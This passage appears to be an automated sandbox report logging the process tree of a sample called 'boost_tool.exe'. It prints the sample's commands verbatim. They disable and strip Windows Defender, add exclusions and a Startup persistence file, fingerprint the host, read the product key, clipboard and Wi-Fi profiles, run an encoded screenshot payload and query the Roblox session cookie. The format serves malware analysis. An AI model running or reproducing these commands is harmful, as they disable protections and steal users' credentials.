    3⤵
    PID:1524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:5924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2176
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:6004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:5244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:876
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:1260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\boost_tool.exe'
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
1⤵
PID:5216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
1⤵
- Suspicious use of WriteProcessMemory
PID:1000

C:\Users\Admin\Downloads\boost_tool.exe
"C:\Users\Admin\Downloads\boost_tool.exe"
1⤵
- Executes dropped EXE
PID:4588
- C:\Users\Admin\Downloads\boost_tool.exe
  "C:\Users\Admin\Downloads\boost_tool.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎‎.scr'"
    3⤵
    PID:2236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎‎.scr'
      4⤵
      PID:1380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:2812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      PID:2504
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:5860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\boost_tool.exe'"
    3⤵
    PID:5212
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\boost_tool.exe'
      4⤵
      PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1568
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:5588
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:5784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:5824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      PID:6012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:5268
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5888
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:5320
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5828
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5236
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3120
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5992
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3464
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:328
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4916
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5904
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3988
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1392
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
